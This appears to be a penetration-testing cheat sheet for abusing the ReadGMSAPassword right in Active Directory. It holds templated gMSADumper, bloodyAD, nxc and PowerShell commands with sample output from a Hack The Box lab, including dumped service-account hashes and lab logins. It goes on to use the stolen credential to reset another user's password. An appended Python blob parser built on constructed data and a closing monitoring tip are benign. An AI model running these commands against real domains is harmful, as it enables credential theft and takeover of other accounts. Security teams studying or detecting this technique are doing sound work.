Abuse #1: Read GMSAPassword (From Linux)
1. Set the principals allowed to retrieve the password for this gMSA [Optional]
Set-ADServiceAccount -Identity "<TARGET_IDENTITY>" -PrincipalsAllowedToRetrieveManagedPassword "<USER>"
Sample Output:
TO-DO
2. Read GMSA Password
# Password
python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -l <DC> -d <DOMAIN>
Sample Output:
$ python3 gMSADumper.py -u ted.graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::745bd2c68dfc101a74f48d87027c7dc6
svc_int$:aes256-cts-hmac-sha1-96:8b2e9edb20258a45ad9084c89e7df761f3b85da5abd92849c150d4ed43f1056f
svc_int$:aes128-cts-hmac-sha1-96:798345b20bd9a8866a87b351c0ad68f3
# NTLM
python3 gMSADumper.py -u '<USER>' -p '<LM_HASH>:<NT_HASH>' -l <DC> -d <DOMAIN>
Sample Output:
TO-DO
# Kerberos
python3 gMSADumper.py -k -l <DC> -d <DOMAIN>
Sample Output:
TO-DO
Ref: gMSADumper
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
$ bloodyAD -d intelligence.htb -u ted.graves -p 'Mr.Teddy' --host intelligence.htb get object 'svc_int$' --attr msDS-ManagedPassword
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
TO-DO
# Kerberos
bloodyAD -d <DOMAIN> -u '<USER>' -k ccache='<USER>.ccache' --host <DC> get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
TO-DO
Ref: bloodyAD
# Password
nxc ldap -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> <DC> --gmsa
Sample Output:
$ nxc ldap -u ted.graves -p 'Mr.Teddy' -d intelligence.htb dc01.intelligence.htb --gmsa
SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.10.248 636 DC [+] intelligence.htb\ted.graves:Mr.Teddy
LDAPS 10.10.10.248 636 DC [*] Getting GMSA Passwords
LDAPS 10.10.10.248 636 DC Account: svc_int$ NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4
# NTLM
nxc ldap -u '<USER>' -H '<HASH>' -d <DOMAIN> <DC> --gmsa
Sample Output:
TO-DO
# Kerberos
nxc ldap -u '<USER>' -k --use-kcache -d <DOMAIN> <DC> --gmsa
Sample Output:
TO-DO
Abuse #2: Save as Cred
$gmsa = Get-ADServiceAccount -Identity '<TARGET_IDENTITY>' -Properties 'msDS-ManagedPassword'
Sample Output:
PS C:\programdata> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
Sample Output:
PS C:\programdata> $mp = $gmsa.'msDS-ManagedPassword'
PS C:\programdata> ConvertFrom-ADManagedPasswordBlob $mp
Version : 1
CurrentPassword : ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾ롤
ᒛ�䬁ማ譿녓鏶骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱茾蒚⟒澽座걍盡篇
SecureCurrentPassword : System.Security.SecureString
PreviousPassword :
SecurePreviousPassword :
QueryPasswordInterval : 2019.19:45:41.4967000
UnchangedPasswordInterval : 2019.19:40:41.4967000
$password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
Sample Output:
PS C:\programdata> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
$SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
Sample Output:
PS C:\programdata> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential '<TARGET_NAME>', $SecPass
Sample Output:
PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential 'BIR-ADFS-GMSA', $SecPass
# For example, reset the password of another target user with the gMSA's credential
Invoke-Command -ComputerName <COMPUTER_NAME> -ScriptBlock {Set-ADAccountPassword -Identity '<ANOTHER_TARGET_NAME>' -reset -NewPassword (ConvertTo-SecureString -AsPlainText '<NEW_PASSWORD>' -force)} -Credential $cred
Sample Output:
PS C:\programdata> Invoke-Command -ComputerName . -ScriptBlock {Set-ADAccountPassword -Identity 'tristan.davies' -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'Test1234' -force)} -Credential $cred
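The msDS-ManagedPassword value that bloodyAD prints as B64ENCODED in Abuse #1 and that ConvertFrom-ADManagedPasswordBlob unpacks in Abuse #2 is an MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19). The following is an added example, not code from this page nor from gMSADumper, bloodyAD or nxc: it serialises a constructed blob with that layout and parses it back into the same fields the PowerShell output shows (Version, CurrentPassword, PreviousPassword, QueryPasswordInterval, UnchangedPasswordInterval). The password and intervals are made up, and build_blob, parse_blob and parse_b64 are names chosen here. On the defensive side it makes the point concrete: every principal in PrincipalsAllowedToRetrieveManagedPassword receives the clear-text password in this attribute, so that list should be reviewed like any other credential store.

```python
"""
Parser for the MSDS-MANAGEDPASSWORD_BLOB structure (MS-ADTS 2.2.19) that
Active Directory returns in the msDS-ManagedPassword attribute of a gMSA.
Added stand-alone example; the sample data is constructed, not from a domain.
"""
import base64
import struct
from datetime import timedelta
from typing import Optional

# Fixed header: Version, Reserved, Length, then four offsets (all little-endian).
HEADER = struct.Struct("<HHLHHHH")
HUNDRED_NS_PER_SECOND = 10_000_000  # intervals are stored in 100 ns units


def build_blob(current: str, previous: Optional[str],
               query_interval: timedelta, unchanged_interval: timedelta) -> bytes:
    """Serialise a blob with the layout AD uses (used here to make test data)."""
    cur = current.encode("utf-16-le") + b"\x00\x00"   # null-terminated UTF-16LE
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    cur_off = HEADER.size
    prev_off = cur_off + len(cur) if previous else 0   # 0 means "no previous password"
    body_len = HEADER.size + len(cur) + len(prev)
    pad = (-body_len) % 8                              # AlignmentPadding to 8 bytes
    q_off = body_len + pad
    u_off = q_off + 8
    length = u_off + 8                                 # Length covers the whole blob
    header = HEADER.pack(1, 0, length, cur_off, prev_off, q_off, u_off)

    def ticks(td: timedelta) -> int:
        return int(td.total_seconds() * HUNDRED_NS_PER_SECOND)

    return (header + cur + prev + b"\x00" * pad
            + struct.pack("<QQ", ticks(query_interval), ticks(unchanged_interval)))


def _read_utf16z(data: bytes, offset: int) -> str:
    """Read a null-terminated UTF-16LE string starting at offset."""
    end = offset
    while end + 1 < len(data) and data[end:end + 2] != b"\x00\x00":
        end += 2
    return data[offset:end].decode("utf-16-le")


def parse_blob(data: bytes) -> dict:
    """Decode a blob into the fields ConvertFrom-ADManagedPasswordBlob displays."""
    version, reserved, length, cur_off, prev_off, q_off, u_off = HEADER.unpack_from(data)
    if version != 1 or reserved != 0:
        raise ValueError("not a version 1 MSDS-MANAGEDPASSWORD_BLOB")
    if length != len(data):
        raise ValueError(f"Length field {length} does not match {len(data)} bytes")
    (query_ticks,) = struct.unpack_from("<Q", data, q_off)
    (unchanged_ticks,) = struct.unpack_from("<Q", data, u_off)
    return {
        "Version": version,
        "CurrentPassword": _read_utf16z(data, cur_off),
        "PreviousPassword": _read_utf16z(data, prev_off) if prev_off else None,
        "QueryPasswordInterval": timedelta(seconds=query_ticks / HUNDRED_NS_PER_SECOND),
        "UnchangedPasswordInterval": timedelta(seconds=unchanged_ticks / HUNDRED_NS_PER_SECOND),
    }


def parse_b64(b64: str) -> dict:
    """Same, for the base64 form bloodyAD prints (msDS-ManagedPassword.B64ENCODED)."""
    return parse_blob(base64.b64decode(b64))


# Constructed samples (not real gMSA data): one without a previous password,
# one just after a rotation so both passwords are present.
SAMPLE = build_blob("Example-gMSA-P@ssw0rd", None,
                    timedelta(days=5), timedelta(days=30))
SAMPLE_WITH_PREVIOUS = build_blob("new-constructed-pw", "old-constructed-pw",
                                  timedelta(hours=1), timedelta(days=1))

if __name__ == "__main__":
    for name, value in parse_blob(SAMPLE).items():
        print(f"{name}: {value}")
```

The NTLM value the tools print (gMSADumper, nxc, bloodyAD's msDS-ManagedPassword.NTLM) is the MD4 of the raw UTF-16LE CurrentPassword bytes, which is why the blob does not need to be converted to a printable string to be used as a credential; from a monitoring standpoint, treat LDAP reads of msDS-ManagedPassword by anything other than the intended host accounts the same way as a credential dump.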